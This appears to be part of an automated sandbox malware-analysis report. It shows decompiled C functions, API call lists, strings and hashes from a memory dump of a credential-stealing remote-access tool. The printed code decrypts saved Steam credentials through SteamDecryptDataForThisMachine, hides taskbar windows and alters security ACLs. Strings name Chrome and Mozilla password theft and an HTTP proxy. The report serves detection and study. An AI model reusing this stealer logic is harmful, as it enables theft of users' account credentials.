                                    						_t31 = _t113 + 0x3a; // 0x3b
                                    						_v34 = _t31;
                                    						_v38 = 0;
                                    						_v36 = 0;
                                    						_v42 = _v34 + _v72;
                                    						_v44 = 0x4d42;
                                    						_t73 = GlobalAlloc(0, _v72);
                                    						_t93 = _t73;
                                    						if(_t93 != 0) {
                                    							GlobalFix(_t93);
                                    							_v76 = _t73;
                                    							_v80 = GetDC(0);
                                    							if(GetDIBits(_v80, _v84, 0, _v60, _v76, _t115, 0) != 0) {
                                    								E24023314( *_t117, 0xe,  &_v72);
                                    								_t47 = _t113 + 0x2c; // 0x2d
                                    								E24023314( *_t117, _t47, _t115);
                                    								E24023314( *_t117, _v100, _v104);
                                    								_t116 = 1;
                                    							}
                                    							ReleaseDC(0, _v108);
                                    							GlobalUnWire(_t93);
                                    							GlobalFree(_t93);
                                    						}
                                    					}
                                    					E2401135C(_t115);
                                    					DeleteObject(_v84);
                                    				}
                                    				return _t116;
                                    			}

                                    APIs
                                    • GetObjectA.GDI32(?,00000018,?), ref: 240372F4
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 240373B2
                                    • GlobalFix.KERNEL32(00000000), ref: 240373C2
                                    • GetDC.USER32(00000000), ref: 240373CD
                                    • GetDIBits.GDI32(?,?,00000000,?,?,00000000,00000000), ref: 240373EF
                                    • ReleaseDC.USER32(00000000,?), ref: 24037432
                                    • GlobalUnWire.KERNEL32(00000000), ref: 24037438
                                    • GlobalFree.KERNEL32(00000000), ref: 2403743E
                                    • DeleteObject.GDI32(?), ref: 24037452
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Global$Object$AllocBitsDeleteFreeReleaseWire
                                    • String ID: BM
                                    • API String ID: 2671967280-2348483157
                                    • Opcode ID: 7239cca198844cb54eff92d7bf05901ef6670e854347018845be8973e6573da8
                                    • Instruction ID: 8e7414cf427611de08e11995701ccc77211d8543a951425a8c570c3674851b6b
                                    • Opcode Fuzzy Hash: 7239cca198844cb54eff92d7bf05901ef6670e854347018845be8973e6573da8
                                    • Instruction Fuzzy Hash: 6B412C716047019FE304DF69C880A5FFBE9EFD8714F40C929F9989B2A4E770E9458B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 42%
                                    			E240535C4(void* __eax) {
                                    				intOrPtr _v32;
                                    				char* _v44;
                                    				char _v45;
                                    				char _v46;
                                    				intOrPtr _v55;
                                    				char _v56;
                                    				char _v60;
                                    				void* _v64;
                                    				void* _v80;
                                    				void* _v108;
                                    				char* _t26;
                                    				void* _t27;
                                    				void* _t44;
                                    				void*** _t45;
                                    
                                    				_t44 = __eax;
                                    				 *_t45 = 0;
                                    				_v32 = 0;
                                    				_push(_t45);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(4);
                                    				_push(6);
                                    				_push(__eax);
                                    				L240534DC();
                                    				if(0 == 0) {
                                    					L5:
                                    					E24015474();
                                    					_v60 = 2;
                                    					_v56 = 1;
                                    					_v55 = 0;
                                    					_v46 = 1;
                                    					_v45 = 1;
                                    					_v44 = "CURRENT_USER";
                                    					_push( &_v64);
                                    					_push(0);
                                    					_t26 =  &_v60;
                                    					_push(_t26);
                                    					_push(1);
                                    					L240534E4();
                                    					if(_t26 != 0) {
                                    						if( *_t45 != 0) {
                                    							LocalFree( *( *_t45));
                                    						}
                                    						if(_v80 != 0) {
                                    							LocalFree(_v80);
                                    						}
                                    					}
                                    					_push(0);
                                    					_t27 = _v80;
                                    					_push(_t27);
                                    					_push(0);
                                    					_push(0);
                                    					_push(4);
                                    					_push(6);
                                    					_push(_t44);
                                    					L240534EC();
                                    					if(_t27 == 0) {
                                    						L15:
                                    						return _t27;
                                    					} else {
                                    						if( *_t45 != 0) {
                                    							_t27 = LocalFree( *( *_t45));
                                    						}
                                    						if(_v108 == 0) {
                                    							goto L15;
                                    						} else {
                                    							return LocalFree(_v108);
                                    						}
                                    					}
                                    				}
                                    				if( *_t45 != 0) {
                                    					LocalFree( *( *_t45));
                                    				}
                                    				if(_v64 != 0) {
                                    					LocalFree(_v64);
                                    				}
                                    				goto L5;
                                    			}
                                    0x240535c9
                                    0x240535cf
                                    0x240535d4
                                    0x240535d8
                                    0x240535d9
                                    0x240535db
                                    0x240535dc
                                    0x240535de
                                    0x240535e0
                                    0x240535e2
                                    0x240535e4
                                    0x240535e5
                                    0x240535ec
                                    0x24053610
                                    0x24053619
                                    0x2405361e
                                    0x24053626
                                    0x2405362d
                                    0x24053631
                                    0x24053636
                                    0x24053640
                                    0x24053648
                                    0x24053649
                                    0x2405364a
                                    0x2405364e
                                    0x2405364f
                                    0x24053651
                                    0x24053658
                                    0x2405365e
                                    0x24053666
                                    0x24053666
                                    0x24053670
                                    0x24053677
                                    0x24053677
                                    0x24053670
                                    0x2405367c
                                    0x2405367e
                                    0x24053682
                                    0x24053683
                                    0x24053685
                                    0x24053687
                                    0x24053689
                                    0x2405368b
                                    0x2405368c
                                    0x24053693
                                    0x240536bc
                                    0x240536bc
                                    0x24053695
                                    0x24053699
                                    0x240536a1
                                    0x240536a1
                                    0x240536ab
                                    0x00000000
                                    0x240536ad
                                    0x00000000
                                    0x240536b2
                                    0x240536ab
                                    0x24053693
                                    0x240535f2
                                    0x240535fa
                                    0x240535fa
                                    0x24053604
                                    0x2405360b
                                    0x2405360b
                                    0x00000000

                                    APIs
                                    • GetSecurityInfo.ADVAPI32(00000000,00000006,00000004,00000000,00000000,00000000,00000000), ref: 240535E5
                                    • LocalFree.KERNEL32(?,00000000,00000006,00000004,00000000,00000000,00000000,00000000), ref: 240535FA
                                    • LocalFree.KERNEL32(00000000,00000000,00000006,00000004,00000000,00000000,00000000,00000000), ref: 2405360B
                                    • SetEntriesInAclA.ADVAPI32(00000001,00000000,00000000,?), ref: 24053651
                                    • LocalFree.KERNEL32(?,00000000,00000006,00000004,00000000,00000000), ref: 24053666
                                    • LocalFree.KERNEL32(00000000,00000000,00000006,00000004,00000000,00000000), ref: 24053677
                                    • SetSecurityInfo.ADVAPI32(00000000,00000006,00000004,00000000,00000000,00000002,00000000,00000000,00000006,00000004,00000000,00000000), ref: 2405368C
                                    • LocalFree.KERNEL32(?,00000000,00000006,00000004,00000000,00000000,00000002,00000000,00000000,00000006,00000004,00000000,00000000), ref: 240536A1
                                    • LocalFree.KERNEL32(00000000,00000000,00000006,00000004,00000000,00000000,00000002,00000000,00000000,00000006,00000004,00000000,00000000), ref: 240536B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLocal$InfoSecurity$Entries
                                    • String ID: CURRENT_USER
                                    • API String ID: 3140748100-382982459
                                    • Opcode ID: 5d5b86d4491df599058b6e76b1a0fdad853a65abe552e2ed81c33660d23bdbaa
                                    • Instruction ID: f3647fd5df690cd9fed9839c66127286085d772b0688f7efead3ea5545aaeab8
                                    • Opcode Fuzzy Hash: 5d5b86d4491df599058b6e76b1a0fdad853a65abe552e2ed81c33660d23bdbaa
                                    • Instruction Fuzzy Hash: 3231E875609300ABE711DFB8C885B5BB7D8EB54748F00882DF688CB2A5D7B5D884CB63
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,2402EBCE), ref: 2402EA5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: EnviarStream$GetChromePass$GetContactList$GetCurrentMSNSettings$GetMSNStatus$Mozilla3_5Password$SetMSNStatus$StartHttpProxy
                                    • API String ID: 621844428-2405909186
                                    • Opcode ID: 3d1eaf518a95b70ca1cf5b55d55d5cc14d1118f086f3a2f16286b72978b6a192
                                    • Instruction ID: ffd9935fda3238913ec9bd14668f9fbe7882b3bd8998229c697508ce8c05cbfa
                                    • Opcode Fuzzy Hash: 3d1eaf518a95b70ca1cf5b55d55d5cc14d1118f086f3a2f16286b72978b6a192
                                    • Instruction Fuzzy Hash: 92517470908909AFFB01DFA5CC51AAFBBF8FB95204F518075E418F7288D7749AC18BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E2403D600(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				intOrPtr _t98;
                                    				intOrPtr _t99;
                                    				intOrPtr _t101;
                                    				intOrPtr _t105;
                                    				intOrPtr _t106;
                                    				void* _t108;
                                    
                                    				_t108 = __eflags;
                                    				_t105 = _t106;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v8 = __eax;
                                    				_push(_t105);
                                    				_push(0x2403d7d9);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t106;
                                    				E24013088(_v8);
                                    				_push(_t105);
                                    				_push(0x2403d7ac);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t106;
                                    				E2403D15C(0x80000001, __ebx, "SteamPath", "Software\\Valve\\Steam\\", __edi, __esi, _t108,  &_v12);
                                    				E240130DC(0x2405cb40, _v12);
                                    				E24013388( &_v16, "/ClientRegistry.Blob",  *0x2405cb40);
                                    				if(E2403D3F8(_v16, _t108) != 0) {
                                    					E24013388( &_v20, "\\ClientRegistry.blob",  *0x2405cb40);
                                    					 *0x2405cb48 = E240234DC(1, 0);
                                    					 *0x2405cb44 = E2403D248(0, 1);
                                    					E24023334( *0x2405cb44, __ebx,  *0x2405cb48, __edi, __esi, E24023180( *0x2405cb48), 1);
                                    					E2403D238(0x2405cb48);
                                    					 *0x2405cb4c = E24013674("Phrase",  *((intOrPtr*)( *0x2405cb44 + 4)));
                                    					 *0x2405cb4c =  *0x2405cb4c + 0x28;
                                    					E24013590( *((intOrPtr*)( *0x2405cb44 + 4)), 0xff,  *0x2405cb4c,  &_v24);
                                    					 *0x2405cb54 = E24013534(_v24);
                                    					E2403D238(0x2405cb44);
                                    					E24013388( &_v28, "\\steam.dll",  *0x2405cb40);
                                    					 *0x2405cb58 = GetProcAddress(LoadLibraryA(E24013534(_v28)), "SteamDecryptDataForThisMachine");
                                    					 *0x2405cb58( *0x2405cb54, E2403D378( *0x2405cb54, __edi), 0x2405cb60, 0x64, 0x2405cb5c);
                                    					E240132EC(_v8, 0x64, 0x2405cb60);
                                    					_pop(_t98);
                                    					 *[fs:eax] = _t98;
                                    				} else {
                                    					_pop(_t101);
                                    					 *[fs:eax] = _t101;
                                    				}
                                    				_pop(_t99);
                                    				 *[fs:eax] = _t99;
                                    				_push(0x2403d7e0);
                                    				return E240130AC( &_v28, 5);
                                    			}
                                    0x2403d600
                                    0x2403d601
                                    0x2403d605
                                    0x2403d606
                                    0x2403d607
                                    0x2403d608
                                    0x2403d609
                                    0x2403d60a
                                    0x2403d60b
                                    0x2403d60c
                                    0x2403d60d
                                    0x2403d60e
                                    0x2403d613
                                    0x2403d614
                                    0x2403d619
                                    0x2403d61c
                                    0x2403d622
                                    0x2403d629
                                    0x2403d62a
                                    0x2403d62f
                                    0x2403d632
                                    0x2403d648
                                    0x2403d655
                                    0x2403d668
                                    0x2403d677
                                    0x2403d696
                                    0x2403d6aa
                                    0x2403d6bd
                                    0x2403d6d9
                                    0x2403d6e3
                                    0x2403d6fa
                                    0x2403d6ff
                                    0x2403d71d
                                    0x2403d72a
                                    0x2403d734
                                    0x2403d74c
                                    0x2403d765
                                    0x2403d787
                                    0x2403d79d
                                    0x2403d7a4
                                    0x2403d7a7
                                    0x2403d679
                                    0x2403d67b
                                    0x2403d67e
                                    0x2403d67e
                                    0x2403d7c0
                                    0x2403d7c3
                                    0x2403d7c6
                                    0x2403d7d8

                                    APIs
                                      • Part of subcall function 2403D15C: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D194
                                      • Part of subcall function 2403D15C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D1B8
                                      • Part of subcall function 2403D15C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001), ref: 2403D1E2
                                      • Part of subcall function 2403D15C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 2403D1FC
                                    • LoadLibraryA.KERNEL32(00000000,SteamDecryptDataForThisMachine,?,00000000,?,?,00000000,2403D7AC,?,00000000,2403D7D9,?,?,?,?,00000000), ref: 2403D75A
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2403D760
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$AddressCloseLibraryLoadOpenProc
                                    • String ID: /ClientRegistry.Blob$Phrase$Software\Valve\Steam\$SteamDecryptDataForThisMachine$SteamPath$\ClientRegistry.blob$\steam.dll
                                    • API String ID: 2859330212-1198945235
                                    • Opcode ID: 2c922d7399686435dada5d433734ebaadaa96e10a540d43e5492c2a8c0bbcf69
                                    • Instruction ID: 4528fdabde31e30e009c5e40282290a982c5814c8aea77971bffa393f329b28c
                                    • Opcode Fuzzy Hash: 2c922d7399686435dada5d433734ebaadaa96e10a540d43e5492c2a8c0bbcf69
                                    • Instruction Fuzzy Hash: D9411A746082449FFB08DFACD89195ABFAAFB58208F504075F804E7255EA79ADC18B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 40%
                                    			E2402158C(void* __eax) {
                                    				struct _MEMORYSTATUS _v44;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				char _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				_Unknown_base(*)()* _t83;
                                    				struct HINSTANCE__* _t90;
                                    				_Unknown_base(*)()* _t91;
                                    				intOrPtr* _t92;
                                    
                                    				_t92 =  &_v112;
                                    				_v116 = 0xffffffff;
                                    				_v112 = 0xffffffff;
                                    				_t91 = 0;
                                    				_t90 = LoadLibraryA("kernel32.dll");
                                    				if(_t90 != 0) {
                                    					_t83 = GetProcAddress(_t90, "GlobalMemoryStatusEx");
                                    					if(_t83 != 0) {
                                    						_t91 = _t83;
                                    					} else {
                                    						FreeLibrary(_t90);
                                    						_t90 = 0;
                                    					}
                                    				}
                                    				if(_t91 == 0) {
                                    					L15:
                                    					if(_v112 != 0xffffffff || _v116 != 0xffffffff) {
                                    						L26:
                                    						 *_t92 = _v116;
                                    						_v120 = _v112;
                                    						return  *_t92;
                                    					} else {
                                    						_v44.dwLength = 0x20;
                                    						GlobalMemoryStatus( &_v44);
                                    						if(0 > 6) {
                                    							goto L26;
                                    						}
                                    						switch( *((intOrPtr*)(0 +  &M240216E2))) {
                                    							case 0:
                                    								_v116 = _v44.dwMemoryLoad;
                                    								_v112 = 0;
                                    								goto L26;
                                    							case 1:
                                    								_v116 = _v44.dwTotalPhys;
                                    								_v112 = 0;
                                    								goto L26;
                                    							case 2:
                                    								_v116 = _v44.dwAvailPhys;
                                    								_v112 = 0;
                                    								goto L26;
                                    							case 3:
                                    								_v116 = _v44.dwTotalPageFile;
                                    								_v112 = 0;
                                    								goto L26;
                                    							case 4:
                                    								_v116 = _v44.dwAvailPageFile;
                                    								_v112 = 0;
                                    								goto L26;
                                    							case 5:
                                    								_v116 = _v44.dwTotalVirtual;
                                    								_v112 = 0;
                                    								goto L26;
                                    							case 6:
                                    								_v116 = _v44.dwAvailVirtual;
                                    								_v112 = 0;
                                    								goto L26;
                                    						}
                                    					}
                                    				} else {
                                    					E24015474();
                                    					_v108 = 0x40;
                                    					 *_t91( &_v108);
                                    					if(0 > 6) {
                                    						L14:
                                    						FreeLibrary(_t90);
                                    						goto L15;
                                    					}
                                    					switch( *((intOrPtr*)(0 +  &M2402160A))) {
                                    						case 0:
                                    							_v120 = _v108;
                                    							_v116 = 0;
                                    							goto L14;
                                    						case 1:
                                    							_v120 = _v104;
                                    							_v116 = _v100;
                                    							goto L14;
                                    						case 2:
                                    							_v120 = _v96;
                                    							_v116 = _v92;
                                    							goto L14;
                                    						case 3:
                                    							_v120 = _v88;
                                    							_v116 = _v84;
                                    							goto L14;
                                    						case 4:
                                    							_v120 = _v80;
                                    							_v116 = _v76;
                                    							goto L14;
                                    						case 5:
                                    							_v120 = _v72;
                                    							_v116 = _v68;
                                    							goto L14;
                                    						case 6:
                                    							_v120 = _v64;
                                    							_v116 = _v60;
                                    							goto L14;
                                    					}
                                    				}
                                    			}
                                    0x2402158f
                                    0x24021594
                                    0x2402159c
                                    0x240215a4
                                    0x240215b0
                                    0x240215b4
                                    0x240215bc
                                    0x240215c3
                                    0x240215cf
                                    0x240215c5
                                    0x240215c6
                                    0x240215cb
                                    0x240215cb
                                    0x240215c3
                                    0x240215d3
                                    0x240216a6
                                    0x240216ab
                                    0x2402176c
                                    0x24021770
                                    0x24021777
                                    0x24021788
                                    0x240216bc
                                    0x240216bc
                                    0x240216c9
                                    0x240216d5
                                    0x00000000
                                    0x00000000
                                    0x240216db
                                    0x00000000
                                    0x24021704
                                    0x24021708
                                    0x00000000
                                    0x00000000
                                    0x24021714
                                    0x24021718
                                    0x00000000
                                    0x00000000
                                    0x24021724
                                    0x24021728
                                    0x00000000
                                    0x00000000
                                    0x24021734
                                    0x24021738
                                    0x00000000
                                    0x00000000
                                    0x24021744
                                    0x24021748
                                    0x00000000
                                    0x00000000
                                    0x24021754
                                    0x24021758
                                    0x00000000
                                    0x00000000
                                    0x24021764
                                    0x24021768
                                    0x00000000
                                    0x00000000
                                    0x240216db
                                    0x240215d9
                                    0x240215e2
                                    0x240215e7
                                    0x240215f4
                                    0x240215fd
                                    0x240216a0
                                    0x240216a1
                                    0x00000000
                                    0x240216a1
                                    0x24021603
                                    0x00000000
                                    0x2402162c
                                    0x24021630
                                    0x00000000
                                    0x00000000
                                    0x2402163a
                                    0x24021642
                                    0x00000000
                                    0x00000000
                                    0x2402164c
                                    0x24021654
                                    0x00000000
                                    0x00000000
                                    0x2402165e
                                    0x24021666
                                    0x00000000
                                    0x00000000
                                    0x24021670
                                    0x24021678
                                    0x00000000
                                    0x00000000
                                    0x24021682
                                    0x2402168a
                                    0x00000000
                                    0x00000000
                                    0x24021694
                                    0x2402169c
                                    0x00000000
                                    0x00000000
                                    0x24021603

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 240215AB
                                    • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 240215BC
                                    • FreeLibrary.KERNEL32(00000000,00000000,GlobalMemoryStatusEx,kernel32.dll), ref: 240215C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                    • API String ID: 145871493-802862622
                                    • Opcode ID: e1fb3934133825c4d38daa3d4f2b28a187ec911517f863f4122aae9c70e38406
                                    • Instruction ID: b6818c528f8247894aa1173509f6f87f65344e72adfca0c80db2ed013bb60fe7
                                    • Opcode Fuzzy Hash: e1fb3934133825c4d38daa3d4f2b28a187ec911517f863f4122aae9c70e38406
                                    • Instruction Fuzzy Hash: E2519474A08B41AF9341CF69C48090FBBE5AFC8664F54C92DB4A8DB394E634D9818F53
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E2401180C(void** __eax) {
                                    				long _t29;
                                    				void* _t31;
                                    				long _t34;
                                    				void* _t38;
                                    				void* _t40;
                                    				long _t41;
                                    				int _t44;
                                    				void* _t46;
                                    				long _t54;
                                    				long _t55;
                                    				void* _t58;
                                    				void** _t59;
                                    				DWORD* _t60;
                                    
                                    				_t59 = __eax;
                                    				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                    				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                    				if(0xffffffffffff284f == 0) {
                                    					_t29 = 0x80000000;
                                    					_t55 = 1;
                                    					_t54 = 3;
                                    					 *((intOrPtr*)(__eax + 0x1c)) = 0x24011760;
                                    				} else {
                                    					if(0xffffffffffff284f == 0) {
                                    						_t29 = 0x40000000;
                                    						_t55 = 1;
                                    						_t54 = 2;
                                    					} else {
                                    						if(0xffffffffffff284f != 0) {
                                    							return 0xffffffffffff284d;
                                    						}
                                    						_t29 = 0xc0000000;
                                    						_t55 = 1;
                                    						_t54 = 3;
                                    					}
                                    					_t59[7] = E240117A0;
                                    				}
                                    				_t59[9] = E240117EC;
                                    				_t59[8] = E2401179C;
                                    				if(_t59[0x12] == 0) {
                                    					_t59[2] = 0x80;
                                    					_t59[9] = E2401179C;
                                    					_t59[5] =  &(_t59[0x53]);
                                    					if(_t59[1] == 0xd7b2) {
                                    						if(_t59 != 0x2405b3cc) {
                                    							_push(0xfffffff5);
                                    						} else {
                                    							_push(0xfffffff4);
                                    						}
                                    					} else {
                                    						_push(0xfffffff6);
                                    					}
                                    					_t31 = GetStdHandle();
                                    					if(_t31 == 0xffffffff) {
                                    						goto L37;
                                    					}
                                    					 *_t59 = _t31;
                                    					goto L30;
                                    				} else {
                                    					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                    					if(_t38 == 0xffffffff) {
                                    						L37:
                                    						_t59[1] = 0xd7b0;
                                    						return GetLastError();
                                    					}
                                    					 *_t59 = _t38;
                                    					if(_t59[1] != 0xd7b3) {
                                    						L30:
                                    						if(_t59[1] == 0xd7b1) {
                                    							L34:
                                    							return 0;
                                    						}
                                    						_t34 = GetFileType( *_t59);
                                    						if(_t34 == 0) {
                                    							CloseHandle( *_t59);
                                    							_t59[1] = 0xd7b0;
                                    							return 0x69;
                                    						}
                                    						if(_t34 == 2) {
                                    							_t59[8] = E240117A0;
                                    						}
                                    						goto L34;
                                    					}
                                    					_t59[1] = _t59[1] - 1;
                                    					_t40 = GetFileSize( *_t59, 0) + 1;
                                    					if(_t40 == 0) {
                                    						goto L37;
                                    					}
                                    					_t41 = _t40 - 0x81;
                                    					if(_t41 < 0) {
                                    						_t41 = 0;
                                    					}
                                    					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                    						goto L37;
                                    					} else {
                                    						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                    						_t58 = 0;
                                    						if(_t44 != 1) {
                                    							goto L37;
                                    						}
                                    						_t46 = 0;
                                    						while(_t46 < _t58) {
                                    							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                    								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                    									goto L37;
                                    								} else {
                                    									goto L30;
                                    								}
                                    							}
                                    							_t46 = _t46 + 1;
                                    						}
                                    						goto L30;
                                    					}
                                    				}
			}

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 24011894
                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 240118B8
                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 240118D4
                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 240118F5
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 2401191E
                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 2401192C
                                    • GetStdHandle.KERNEL32(000000F5), ref: 24011967
                                    • GetFileType.KERNEL32(?,000000F5), ref: 2401197D
                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 24011998
                                    • GetLastError.KERNEL32(000000F5), ref: 240119B0
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                    • String ID:
                                    • API String ID: 1694776339-0
                                    • Opcode ID: 5375adedb44e0780fdefc4a4f334666777e8e771e59f5408eda7035d867f4325
                                    • Instruction ID: b3eff8a3c6a3e7c1ac76b44e357d864559ec48cc92848a28bc16ce7744500b40
                                    • Opcode Fuzzy Hash: 5375adedb44e0780fdefc4a4f334666777e8e771e59f5408eda7035d867f4325
                                    • Instruction Fuzzy Hash: 87419130604701AAF72B8F208800B667AE5EF4D754F20CE2DD5EE8F5DCE6659DC48756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E2403DC10(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v136;
                                    				char _v140;
                                    				void* _t32;
                                    				intOrPtr _t36;
                                    				void* _t40;
                                    				struct HWND__* _t42;
                                    				void* _t45;
                                    				int _t48;
                                    
                                    				_t40 = __edi;
                                    				_v140 = 0;
                                    				_v8 = 0;
                                    				_t32 = __eax;
                                    				_push(_t45);
                                    				_push(0x2403dcda);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t45 + 0xffffff78;
                                    				_t42 = GetWindow(FindWindowA("Shell_TrayWnd", 0), 5);
                                    				if(_t42 == 0) {
                                    					L7:
                                    					_pop(_t36);
                                    					 *[fs:eax] = _t36;
                                    					_push(0x2403dce1);
                                    					E24013088( &_v140);
                                    					return E24013088( &_v8);
                                    				} else {
                                    					goto L1;
                                    				}
                                    				do {
                                    					L1:
                                    					_t48 = GetClassNameA(_t42,  &_v136, 0x80);
                                    					if(_t48 > 0) {
                                    						E2403DBFC( &_v136,  &_v8);
                                    						E24015948(_v8, _t32,  &_v140, _t40, _t42, _t48);
                                    						E24013480(_v140, "BUTTON");
                                    						if(_t48 == 0) {
                                    							if(_t32 != 1) {
                                    								ShowWindow(_t42, 0);
                                    							} else {
                                    								ShowWindow(_t42, 1);
                                    							}
                                    						}
                                    					}
                                    					_t42 = GetWindow(_t42, 2);
                                    				} while (_t42 != 0);
                                    				goto L7;
			}

                                    APIs
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 2403DC3D
                                    • GetWindow.USER32(00000000,00000005), ref: 2403DC45
                                    • GetClassNameA.USER32(00000000,?,00000080), ref: 2403DC5D
                                    • GetWindow.USER32(00000000,00000002), ref: 2403DCAE
                                      • Part of subcall function 24015948: CharUpperA.USER32(?,00000000,240159BD,?,240632F8,24063310,00000008,?,?,24051C03,00000010,00000000,24051D9B,?,24063304,2406330C), ref: 24015986
                                    • ShowWindow.USER32(00000000,00000001,Shell_TrayWnd,00000000,00000000,2403DCDA), ref: 2403DC9C
                                    • ShowWindow.USER32(00000000,00000000,Shell_TrayWnd,00000000,00000000,2403DCDA), ref: 2403DCA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$Show$CharClassFindNameUpper
                                    • String ID: BUTTON$Shell_TrayWnd
                                    • API String ID: 1958926019-3627955571
                                    • Opcode ID: 4212d337ae881f7530d7ee9016a1edea1fd828872ff8384a097984d72b53da72
                                    • Instruction ID: de0881b947739c5f218af9f93672c5c0b5334381d158da34a15c0459fac4e038
                                    • Opcode Fuzzy Hash: 4212d337ae881f7530d7ee9016a1edea1fd828872ff8384a097984d72b53da72
